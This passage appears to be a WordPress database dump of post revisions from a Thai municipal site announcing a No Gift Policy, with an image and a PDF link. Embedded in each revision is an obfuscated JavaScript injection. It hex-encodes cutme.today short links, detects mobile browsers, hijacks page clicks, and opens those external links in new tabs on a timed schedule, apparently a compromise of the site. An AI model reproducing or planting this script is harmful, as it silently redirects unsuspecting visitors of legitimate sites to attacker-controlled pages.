)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:37:26','2025-06-09 06:37:26','',859,'http://pakhaeng.ssk.in.th/?p=1302',0,'revision','',0),
(1303,1,'2025-06-09 13:37:58','2025-06-09 06:37:58','<!-- wp:image {\"id\":1298,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112-1024x256.png\" alt=\"\" class=\"wp-image-1298\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:37:58','2025-06-09 06:37:58','',859,'http://pakhaeng.ssk.in.th/?p=1303',0,'revision','',0),
(1304,1,'2025-06-09 13:38:00','2025-06-09 06:38:00','<!-- wp:image {\"id\":1298,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112-1024x256.png\" alt=\"\" class=\"wp-image-1298\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new 